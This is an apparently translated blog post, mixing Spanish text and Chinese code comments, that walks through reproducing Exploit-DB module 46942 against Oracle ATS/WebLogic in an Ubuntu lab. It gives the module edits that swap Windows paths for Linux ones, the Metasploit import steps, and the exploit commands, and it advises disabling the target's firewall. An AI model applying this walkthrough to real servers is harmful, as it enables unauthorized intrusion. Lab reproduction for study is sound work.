Cve N / A vuelve a aparecer (entorno de la máquina de destino Ubuntu18.04)

Fuente de esta exp: https://www.exploit-db.com/exploits/46942

De hecho, esta exp se puede reproducir con éxito en el entorno Linux, pero debe cambiar el código fuente descargado del sitio web oficial;

Línea de código fuente 62, puede ver que el último elemento es el método de representación de ruta en el sistema Windows, que debe cambiarse a la ruta correspondiente en el sistema Linux

OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
#用如下代码替换
OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS','/root/Oracle/Middleware/user_projects/domains/'])

Código fuente línea 187, ibid

app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
#用如下代码替换
app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, 'base_domain/servers/AdminServer/upload')

Código fuente línea 238, igual que arriba

app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
#用如下代码替换
app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, "base_domain/servers/AdminServer/upload/#{war_name}.war")

A continuación, importe el script en metasploit: vaya al directorio principal del script (aquí nombro el script 1.rb, aquí se reemplaza uno con su propio nombre de script)

sudo cp 1.rb /opt/metasploit-framework/embedded/framework/modules/exploits/
sudo chmod +x /opt/metasploit-framework/embedded/framework/modules/exploits/1.rb

Abra metasploit en la terminal y vuelva a cargar todos los scripts.

reload_all
#因为我将脚本命名为1.rb,所以metasploit导入脚本之后将其标记为1
use exploits/1
#可以看一下此脚本需要设置哪些参数
show options
#设置脚本需要的参数
set RHOSTS <ip>
set RPORT <port>
set OATSUSERNAME <weblogic_user_name>
set OATSPASSWORD <password>

Para la máquina de destino, debe instalar la versión weblogic que cumpla con los requisitos; luego cierre el firewall; luego siga los comandos anteriores en la máquina de ataque:

exploit

El efecto de ataque es el siguiente:

Publicado 9 artículos originales · elogiado 0 · visitas 116

Supongo que te gusta

Origin blog.csdn.net/ckm1607011/article/details/105477943
Recomendado
Clasificación